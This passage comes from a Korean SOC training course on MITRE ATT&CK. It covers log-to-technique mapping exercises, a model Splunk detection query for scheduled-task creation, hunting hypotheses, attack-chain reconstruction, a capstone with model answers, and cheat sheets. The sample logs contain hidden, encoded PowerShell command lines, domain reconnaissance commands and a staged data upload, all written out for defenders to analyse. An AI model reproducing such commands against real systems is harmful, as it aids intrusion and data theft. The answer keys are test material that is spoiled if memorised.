T1550.002 Pass-the-Hash	0	NetLogon 로그 수집 활성화	인프라팀	2주
T1053.005 Scheduled Task	1	EventID 4698 기반 룰 작성	탐지팀	1주
T1558.003 Kerberoasting	1	TGS 대량 요청 룰 작성	탐지팀	2주
T1566.001 Phishing	2	Atomic Red Team 검증	Purple Team	1개월
T1505.003 Web Shell	1	웹 파일 감사 로그 추가	웹운영팀	3주

✅ Coverage 개선 backlog: 이 표를 Jira/Confluence에 등록해 정기 회의에서 진행 상황을 추적하면 지속적인 보안 수준 향상이 가능합니다

보강 설명 Coverage 분석 결과를 바탕으로 개선 계획을 세우는 방법입니다. 모든 것을 동시에 개선할 수 없으므로 위협 가능성과 자산 중요도를 기준으로 우선순위를 정해야 합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

개선 계획우선순위위협 가능성

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
개선 계획·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

PART 11

종합 실습 6종
& 캡스톤 평가

로그 매핑 → 탐지 쿼리 작성 → 헌팅 가설 → Coverage 평가 → 보고서 작성 → 캡스톤 발표

⏱️ 약 90분 📌 실습 6종 + 캡스톤 📌 개인 또는 팀 과제

실습 1: 주어진 로그를 ATT&CK으로 매핑하라

다음 로그 6건을 Tactic / Technique / Sub-technique + 근거 + Confidence 수준으로 매핑하시오

PART 11 · 종합 실습

# 로그 A Jun 21 03:11:02 sshd: Failed password for root from 45.33.32.156 port 52001 (×47회) Jun 21 03:18:44 sshd: Accepted publickey for admin from 45.33.32.156

# 로그 B 2024-06-21 03:22:11 [EDR] Process: powershell.exe CmdLine: -NoP -NonI -W Hidden -Exec Bypass -Enc SQBFAFgAIAAoAE4AZQB3A... Parent: WINWORD.EXE (PID 3201)

# 로그 C 09:15~09:47 Proxy Log GET https://xn--80aaaf4bwd.xyz/gate.php Interval: 120s (±3s) | Body: 298B 일정 Domain Age: 8일 | VT: 12/94 malicious

로그	Tactic	Technique	근거 (한 줄)	Confidence
A	작성	작성	작성	작성
B	작성	작성	작성	작성
C	작성	작성	작성	작성

채점 포인트

Tactic과 Technique 모두 올바르게 매핑 (각 1점)
근거 로그 라인 구체적으로 인용 (1점)
Confidence 수준과 이유 설명 (1점)
추가 확인이 필요한 로그 식별 (가산점)

보강 설명 실습 1은 주어진 로그를 보고 ATT&CK Technique를 매핑하는 과제입니다. 정답보다 근거와 Confidence 표기가 중요합니다. 5분 개인 작업 후 팀 공유 방식을 권장합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

실습 1로그 매핑근거 제시

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
실습 1를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 1 해설 — 채점 기준 & 모범 답안

정답 암기가 목표가 아니라 근거 있는 판단이 목표 — 다른 해석도 근거가 있으면 인정

PART 11 · 종합 실습 해설

로그	Tactic	Technique	핵심 근거	Confidence	추가 확인 사항
A	Credential Access → Initial Access	T1110.001 Password Guessing → T1078 Valid Accounts	동일 IP 47회 실패 후 다른 계정(admin)으로 성공 — 강력한 Brute Force 패턴	High	admin 계정 이후 행위, 해당 IP 다른 시스템 시도 여부
B	Execution (+ Defense Evasion)	T1059.001 PowerShell T1027 Obfuscation	WINWORD.EXE 자식 powershell.exe + -Hidden -Exec Bypass -Enc(Base64) = 매크로 악용 + 난독화	High	Base64 디코딩 결과, 네트워크 아웃바운드 여부
C	Command and Control	T1071.001 HTTPS C2 Beaconing T1568 Dynamic Resolution	120초±3s 주기 + 298B 크기 일정 + 8일 된 DGA 유사 도메인 + VT 12/94	High	해당 프로세스 식별, 이전 Execution 로그 역추적

💡 강사 피드백 포인트: 로그 A에서 root 실패 후 admin 성공을 Brute Force와 Valid Accounts 두 Technique로 나눠 매핑한 것이 핵심. 하나로만 매핑했다면 체인 관점이 부족한 것

보강 설명 실습 1 해설입니다. 수강생이 먼저 답을 제출한 후에 이 슬라이드를 공개합니다. 틀린 부분보다 왜 그렇게 판단했는지 근거를 묻는 방식으로 피드백을 주세요. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

T1110T1059.001T1071.001

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1110를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 2: T1053.005 Scheduled Task 탐지 쿼리를 작성하라

다음 조건을 모두 포함한 SIEM 탐지 쿼리를 작성하시오 (Splunk 또는 KQL 사용)

PART 11 · 종합 실습

탐지 조건 (필수)

✅ 탐지 대상: Windows 예약 작업 신규 생성 (EventID 4698)
✅ 필터 1: 업무 외 시간 (22:00 ~ 06:00) 생성된 작업만
✅ 필터 2: 실행 파일 경로가 %TEMP%, %APPDATA%, C:\Users 포함
✅ 오탐 제외: 알려진 소프트웨어 업데이터 작업명 제외
✅ 출력 필드: 시간, 호스트명, 사용자, 작업명, 실행 경로

힌트

EventID 4698 = Task Scheduler 새 작업 등록 이벤트
TaskContent 필드에 실행 경로 포함됨
시간 필터: eval hour=strftime(_time,"%H") 활용
제외 목록 예: GoogleUpdateTask*, Adobe*

작성 공간

⏱️ 제한 시간: 10분
완성하지 못해도 괜찮습니다. 조건 중 구현한 것과 못 한 것을 명시하면 부분 점수 인정

보강 설명 실습 2는 주어진 Technique에 대한 SIEM 탐지 쿼리를 직접 작성하는 과제입니다. Splunk 문법 기준으로 작성하되 다른 SIEM 플랫폼도 인정합니다. 오탐 필터링 조건도 반드시 포함해야 합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

T1053.005SIEM 쿼리 작성Splunk

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1053.005를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 2 해설 — T1053.005 탐지 쿼리 모범 답안

조건을 하나씩 추가하면서 점진적으로 완성하는 것이 실무적인 룰 작성 방법이다

PART 11 · 종합 실습 해설

# Splunk 모범 답안 index=winevent EventCode=4698 # 조건1: 업무외 시간 | eval hour=strftime(_time, "%H") | where hour < 6 OR hour >= 22 # 조건2: 의심 실행 경로 | search TaskContent IN ("*\\Temp\\*", "*\\AppData\\*", "*\\Users\\Public\\*") # 조건3: 알려진 정상 작업 제외 (오탐) | NOT TaskName IN ("GoogleUpdateTask*", "Adobe*Update*", "Microsoft*Update*") # 출력 | table _time, ComputerName, SubjectUserName, TaskName, TaskContent | sort -_time

채점 기준 (10점)

EventID 4698 올바른 사용: 2점
시간 필터 구현: 2점
의심 경로 필터: 2점
오탐 제외 목록: 2점
출력 필드 명시: 1점
ATT&CK 태그 추가 (가산점): 1점

💡 추가 개선 포인트:
• 주중/주말을 구분한 다른 임계값
• TaskContent에서 실행 파일 해시 추출
• 같은 호스트의 연속 작업 등록 탐지
• ATT&CK 태그 필드 추가

보강 설명 실습 2 해설입니다. 모범 답안 쿼리를 보여주고 각 조건이 왜 필요한지 설명합니다. 특히 오탐 제외 목록을 처음부터 관리하는 습관이 중요합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

T1053.005Splunk 쿼리EventID 4698

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1053.005를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 3: 다음 시나리오에 맞는 헌팅 가설을 작성하라

시나리오 → 가설 수립 → 데이터 원천 식별 → 탐색 쿼리 아이디어 → 판단 기준

PART 11 · 종합 실습

시나리오 (CTI 인텔리전스)

최근 KISA 보안 공지에서 국내 제조업체를 대상으로 한 APT 그룹이 T1055 Process Injection과 T1562.001 Impair Defenses를 조합해 사용한 사실이 확인되었습니다. 특히 lsass.exe에 코드를 주입해 자격증명을 탈취하고, 직후 EDR 에이전트를 비활성화하는 패턴이 관찰되었습니다.

가설 작성 프레임

만약 공격자가 [____________] 했다면,
[____________] 시스템에서
[____________] 이벤트/로그가
[____________] 패턴으로 나타났을 것이다.
이를 최근 [___일] 데이터에서 탐색한다.

작성 가이드

연결 Technique: T1055 또는 T1562.001을 명시
데이터 원천: 어떤 로그/센서에서 탐색할지 명시
탐색 쿼리 아이디어: 어떤 조건으로 검색할지 키워드
판단 기준: 발견 시 정상/의심을 구분하는 기준
기대 결과: 발견 시 대응, 미발견 시 Coverage 평가

⏱️ 제한 시간: 8분 개인 작성
이후 3명씩 팀을 구성해 서로의 가설을 비교하고 가장 테스트 가능성이 높은 가설을 선정해 발표

보강 설명 실습 3은 헌팅 가설을 직접 작성하는 과제입니다. 좋은 가설은 ATT&CK Technique에 연결되고, 실제 데이터로 테스트 가능하며, 발견과 미발견 모두 가치가 있어야 합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

헌팅 가설HypothesisATT&CK 연결

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
헌팅 가설를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 3 해설 — 헌팅 가설 모범 예시

여러 가설이 모두 유효 — 데이터로 테스트 가능하고 발견/미발견 모두 가치 있으면 좋은 가설

PART 11 · 종합 실습 해설

가설 예시 A (T1055 중심)

"만약 공격자가 lsass.exe에 Process Injection을 수행했다면, EDR에서 비정상 프로세스(non-system)가 lsass.exe에 OpenProcess + WriteProcessMemory API를 호출한 이벤트가 최근 7일 내 관찰되었을 것이다."

데이터: EDR API 호출 로그, Sysmon EventID 10
쿼리: lsass.exe 대상 OpenProcess 호출 + 호출 프로세스가 비시스템

가설 예시 B (T1562 중심)

"만약 EDR 에이전트가 비활성화되었다면, 서비스 중지(EventID 7036) + 직후 보안 로그 클리어(EventID 1102)가 같은 호스트에서 5분 이내 연속 발생했을 것이다."

데이터: WinEvent 7036, 1102
쿼리: 5분 내 7036(보안솔루션서비스)+1102 연속 이벤트

채점 기준 (10점)

ATT&CK Technique 올바르게 연결: 2점
테스트 가능한 구체적 데이터 원천: 2점
탐색 조건 명시 (키워드/이벤트 ID): 2점
정상/의심 판단 기준 제시: 2점
발견/미발견 시 후속 계획: 2점

💡 강사 포인트:
두 가설(A, B)을 조합해 "lsass.exe 접근 + 직후 EDR 중지"를 순서 있는 체인으로 잡는 가설이 가장 신뢰도 높은 헌팅 전략입니다

보강 설명 실습 3 해설입니다. 여러 가설 형태가 모두 정답이 될 수 있습니다. 중요한 것은 ATT&CK 연결, 테스트 가능성, 발견/미발견 가치입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

T1055헌팅 가설 해설T1055 Process Inj…

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1055를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 4: 다음 로그들을 공격 체인으로 재구성하라

시간 순서 정렬 → ATT&CK 매핑 → 체인 연결 → 보고 문장 작성 (15분)

PART 11 · 종합 실습

# 로그 묶음 (순서 섞임 — 시간 정렬 필요) [D] 14:32:01 netflow: 10.10.10.55→45.77.12.3:443 size=312B, interval=60s (4시간 지속) [A] 09:14:33 mail-gw: RECV Q3report_final.xlsm From: cfo@secure-docs[.]biz (DKIM:FAIL) [C] 09:31:07 EDR: cmd.exe → net user /domain cmd.exe → net group "Domain Admins" cmd.exe → ipconfig /all [E] 16:11:22 filelog: \\filesvr\Finance 폴더 847개 파일 복사 → C:\Users\Public\tmp.zip [B] 09:22:45 EDR: EXCEL.EXE → powershell.exe cmdline: -w hidden -enc SQBFAFgA... [F] 16:44:01 proxy: POST dropbox.com/upload file=tmp.zip size=2.3GB user=choi.junho

작성 과제

① 시간 순서: [A]~[F]를 올바른 순서로 배열
② ATT&CK 매핑: 각 로그에 Tactic + Technique 매핑
③ 체인 연결: 각 단계가 다음 단계로 이어지는 논리 설명
④ 보고 문장: 30초 구두 설명 문장 작성

추가 분석 질문

이 공격에서 탐지 기회는 몇 번이었는가?
어떤 단계에서 차단했어야 피해를 최소화할 수 있었는가?
탐지하지 못한 단계가 있다면 어떤 로그가 필요한가?

보강 설명 실습 4는 여러 로그를 시간 순서대로 정렬하고 하나의 공격 체인으로 재구성하는 과제입니다. 이 실습이 캡스톤과 가장 유사한 형태입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

공격 체인 재구성타임라인ATT&CK 매핑

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
공격 체인 재구성를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 4 해설 — 공격 체인 재구성 모범 답안

A → B → C → D → E → F — 피싱에서 데이터 유출까지 7시간 만에 완성된 체인

PART 11 · 종합 실습 해설

순서	로그	시간	Tactic	Technique	핵심 판단 근거
1	[A]	09:14	Initial Access	T1566.001	xlsm 첨부파일 + DKIM 실패 스푸핑 도메인
2	[B]	09:22	Execution	T1059.001 + T1027	EXCEL→PowerShell -Hidden -Enc 체인
3	[C]	09:31	Discovery	T1087 + T1069 + T1016	net user/group/ipconfig 대량 실행
4	[D]	14:32~	C&C	T1071.001	60초 주기 HTTPS 아웃바운드 4시간 지속
5	[E]	16:11	Collection	T1039 + T1560	Finance 폴더 847개 복사 → zip 압축
6	[F]	16:44	Exfiltration	T1567.002	2.3GB zip → Dropbox 업로드

📝 30초 보고 문장: "오전 9시 14분 스피어피싱 첨부파일(T1566.001) 실행을 시작으로 PowerShell 악성 코드가 실행(T1059.001)되었고, 내부 정찰(T1087) 후 약 5시간의 C2 Beaconing(T1071.001)을 통해 명령을 수신했습니다. 오후 4시 11분 Finance 폴더 847개 파일이 수집(T1039)되어 Dropbox로 2.3GB가 유출(T1567.002)되었습니다. 총 7시간 30분의 침해로 최소 3개의 탐지 기회가 있었습니다."

보강 설명 실습 4 해설입니다. 이 시나리오는 피싱→Execution→Discovery→C2→Collection→Exfiltration의 전형적인 체인입니다. 보고 문장을 수강생이 직접 말하게 하면 더 효과적입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

공격 체인 정렬전체 매핑표30초 보고

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
공격 체인 정렬를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실습 5: 실습 4 공격 체인 기준 Coverage 평가

실습 4의 각 단계에서 우리 환경이 탐지 가능했는지 평가하고 공백을 식별한다

PART 11 · 종합 실습

단계	Technique	필요 로그	보유 여부 (○/△/✗)	탐지 룰 (○/△/✗)	Coverage 점수(0~3)	개선 액션
피싱 수신	T1566.001	메일GW, DKIM/SPF 로그	○	○	3	—
PowerShell 실행	T1059.001	EDR, Sysmon EventID 1	작성	작성	작성	작성
내부 정찰	T1087+T1069	EDR 프로세스, WinEvent	작성	작성	작성	작성
C2 Beaconing	T1071.001	Proxy, NetFlow, DNS	작성	작성	작성	작성
데이터 수집	T1039+T1560	파일 감사, DLP	작성	작성	작성	작성
Dropbox 유출	T1567.002	CASB, Proxy 업로드	작성	작성	작성	작성

⏱️ 제한 시간: 10분 팀 토론
팀별로 각 단계의 Coverage 점수를 토론하고 가장 시급한 공백 2개를 선정해 발표

⚠️ 토론 포인트: 어느 단계에서 탐지했다면 피해를 최소화할 수 있었는가? 그 단계의 Coverage 점수는?

보강 설명실습 5는 실습 4의 공격 체인을 기준으로 우리 환경의 Coverage를 평가하는 과제입니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

T1566.001T1059.001Coverage 실습

설명 확장

T1566.001 기준으로 첫 단서를 먼저 분류하기
T1059.001를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

캡스톤 평가: 종합 분석 & 발표

배운 모든 것을 통합해 하나의 사건을 완전히 분석하고 발표한다

PART 11 · 캡스톤

캡스톤 개요

형식: 개인 또는 2인 팀
시간: 30분 분석 + 5분 발표 + 3분 Q&A
제출물: ATT&CK 매핑표 + 탐지/헌팅 제안 + 보고서 초안
발표 도구: 제공된 매핑 워크시트 또는 자유 형식

평가 항목

공격 체인 재구성 정확성 (30%)
ATT&CK 매핑 근거 충실성 (25%)
탐지·헌팅 제안 현실성 (25%)
발표 전달력 & Q&A 대응 (20%)

캡스톤 시나리오 개요

정부기관 A에서 근무하는 분석가가 다음 알림을 받았습니다: EDR에서 새벽 2시 lsass.exe에 대한 비정상 메모리 접근과 PowerShell -Encoded 명령이 탐지되었습니다. 30분 후 보안 에이전트 서비스가 중지되었고, 직후 내부 파일 서버에 대한 대량 접근이 기록되었습니다. 외부 연결은 확인 중입니다.

🎯 캡스톤 분석 과제:
① 공격 흐름 재구성 + ATT&CK 매핑
② 추가 수집이 필요한 로그 3개 식별
③ 탐지 룰 아이디어 2개 제안
④ 30초 보고 문장 작성 & 발표

보강 설명캡스톤 평가는 이번 모듈에서 배운 모든 내용을 종합하는 최종 과제입니다. 개인 또는 2인 팀으로 주어진 시나리오를 분석하고 발표합니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

캡스톤종합 평가발표

설명 확장

캡스톤 기준으로 첫 단서를 먼저 분류하기
종합 평가를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

캡스톤 시나리오: 추가 로그 데이터

아래 로그를 포함해 전체 공격 흐름을 재구성하고 ATT&CK으로 매핑하시오

PART 11 · 캡스톤

# EDR 로그 (02:03~02:45) 02:03:17 process_access: Source: unknown_svc.exe (C:\ProgramData\) Target: lsass.exe Access: PROCESS_VM_READ | PROCESS_VM_WRITE 02:11:44 process_create: powershell.exe -NoP -W Hidden -Enc SGFzaC1maWxlIEM6XFVzZXJz... Parent: unknown_svc.exe 02:33:01 service_stop: ServiceName: EDRAgent StopType: SERVICE_STOP (외부 요청)

# 파일 서버 감사 로그 (02:38~03:12) 02:38~03:12 \\filesvr\Classified\ 접근 접근 계정: svc_backup (서비스 계정) 파일 수: 1,240개 | 총 용량: 4.2GB # WinEvent 4698 (예약 작업 등록) 02:15:33 Task: WindowsUpdateHelper Execute: C:\ProgramData\msupdate.exe Trigger: 매일 02:00 (반복) # 외부 연결 (상태: 분석 중) 03:14 netflow: 10.0.0.55 → ??.??.??.?? :443 (프록시 로그 미수집 — 수집 필요)

⏱️ 분석 시간 30분 시작! — 매핑표 작성 → 추가 수집 필요 로그 식별 → 탐지 제안 → 30초 보고 문장 순서로 진행

보강 설명 캡스톤 시나리오의 추가 로그를 제공합니다. 수강생이 분석한 후 발표할 때 이 로그를 근거로 제시해야 합니다. 로그가 불완전한 부분은 추가 수집 필요 사항으로 표기하게 합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

캡스톤 로그lsass.exePowerShell

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
캡스톤 로그를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

캡스톤 해설 — 모범 매핑표 & 보고 문장

발표 후 공개 — 근거와 논리가 있으면 다른 해석도 인정

PART 11 · 캡스톤 해설

시간	관측 행위	Tactic	Technique	근거 핵심	Confidence
02:03	lsass.exe 메모리 접근	Credential Access	T1003.001 LSASS Memory	VM_READ+VM_WRITE on lsass → Mimikatz 류	High
02:11	PowerShell -Enc 실행	Execution + Def.Eva.	T1059.001 + T1027	unknown_svc.exe 부모 + Base64 인코딩	High
02:15	예약 작업 등록 (Persistence)	Persistence	T1053.005 Scheduled Task	%ProgramData%\msupdate.exe + 새벽 02:00 반복	High
02:33	EDR 에이전트 중지	Defense Evasion	T1562.001 Disable Security Tools	서비스 외부 요청 중지 → 이후 탐지 공백	High
02:38~	파일 서버 대량 접근	Collection	T1039 + T1078	svc_backup 계정으로 1,240개 Classified 접근	Medium
03:14	외부 HTTPS 연결	C2 또는 Exfiltration	T1071.001 또는 T1041	프록시 로그 미수집 — Low Confidence	Low

📝 30초 보고 문장: "새벽 2시 3분, 비표준 경로 프로세스(unknown_svc.exe)가 lsass.exe에 메모리 접근(T1003.001)해 자격증명을 탈취하고, PowerShell로 Persistence를 수립(T1053.005)했습니다. 2시 33분 EDR을 비활성화(T1562.001)한 후 svc_backup 계정으로 기밀 파일 1,240개를 수집했습니다. 외부 연결은 프록시 로그 미수집으로 추가 조사가 필요합니다. 즉시 해당 호스트 격리와 svc_backup 계정 비활성화를 권고합니다."

보강 설명 캡스톤 해설입니다. 수강생 발표 이후에 공개합니다. 완벽한 답이 아니어도 근거와 논리가 있으면 높은 점수를 줍니다. 근거 로그와 다음 행동까지 붙여 적으면 실무 발표와 문서화가 쉬워집니다.

T1055T1562T1003

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1055를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

PART 12

Boost Up!

치트시트 · 용어사전 · 핵심 요약 · 추천 레퍼런스 · 실무 적용 방향

⏱️ 약 20분 📌 복습 자료 & 레퍼런스 📌 실무 적용 체크리스트

치트시트 1: Enterprise 14개 Tactic 한눈에 보기

인쇄 가능한 1-page 참조 카드 — 실무에서 빠르게 Tactic을 확인할 때 사용

PART 12 · 부록

TA0043

Reconnaissance

대표: T1595 T1592 T1598

TA0042

Resource Dev.

대표: T1583 T1584 T1588

TA0001

Initial Access

대표: T1566 T1190 T1078

TA0002

Execution

대표: T1059 T1047 T1053

TA0003

Persistence

대표: T1053 T1543 T1505

TA0004

Priv. Escalation

대표: T1055 T1078 T1068

TA0005

Defense Evasion

대표: T1562 T1027 T1070

TA0006

Credential Access

대표: T1110 T1003 T1558

TA0007

Discovery

대표: T1082 T1018 T1087

TA0008

Lateral Movement

대표: T1021 T1550 T1570

TA0009

Collection

대표: T1005 T1039 T1560

TA0011

Command & Control

대표: T1071 T1573 T1568

TA0010

Exfiltration

대표: T1041 T1567 T1048

TA0040

Impact

대표: T1486 T1490 T1489

💡 기억법: 🔍사전준비(2) → 🚪침투(6) → 🔀확산수집(3) → 📡결과(3) = 14개 Tactic

보강 설명 14개 Tactic을 한 페이지로 정리한 치트시트입니다. 수강생이 인쇄해서 책상에 붙여 두고 참고할 수 있는 형식입니다. 실무에서 빠르게 Tactic을 확인할 때 사용합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

14개 Tactic치트시트실무 참조

이해 포인트

14개 Tactic를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
치트시트 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

치트시트 2: SOC가 가장 많이 보는 핵심 Technique TOP 20

이 20개를 완전히 이해하면 일반 SOC 업무의 80%를 커버할 수 있다

PART 12 · 부록

#	Technique ID	이름	주요 로그
1	T1566	Phishing	메일GW, EDR
2	T1059.001	PowerShell	Sysmon, WinEvent
3	T1110	Brute Force	WinEvent 4625
4	T1078	Valid Accounts	VPN, AD 로그
5	T1190	Exploit Public App	WAF, access.log
6	T1053.005	Scheduled Task	WinEvent 4698
7	T1505.003	Web Shell	파일 감사, access.log
8	T1562.001	Disable Security Tools	WinEvent 7036
9	T1003.001	LSASS Memory Dump	EDR API 감사
10	T1027	Obfuscated Files	EDR, Script 로그

#	Technique ID	이름	주요 로그
11	T1071.001	C2 via HTTPS	Proxy, NetFlow
12	T1082	System Info Discovery	EDR 프로세스
13	T1021.001	RDP	WinEvent 4624
14	T1567	Exfil via Web Svc	CASB, Proxy
15	T1547.001	Registry Run Keys	Sysmon EventID 13
16	T1558.003	Kerberoasting	DC Kerberos 로그
17	T1039	Data from Net Share	파일 서버 감사
18	T1218	System Binary Proxy	EDR, Sysmon
19	T1568	Dynamic Resolution	DNS, Proxy
20	T1486	Ransomware Encrypt	EDR, 파일 감사

보강 설명 SOC에서 가장 자주 보는 Technique TOP 20을 정리했습니다. 이 20개를 완전히 이해하면 일반적인 SOC 업무의 80%를 커버할 수 있습니다. 대표 예시와 로그를 묶어 보면 이해가 빨라집니다.

SOC TOP 20핵심 Technique빈도 높은 기법

이해 포인트

SOC TOP 20를 목적·행위·근거 관점으로 다시 정리
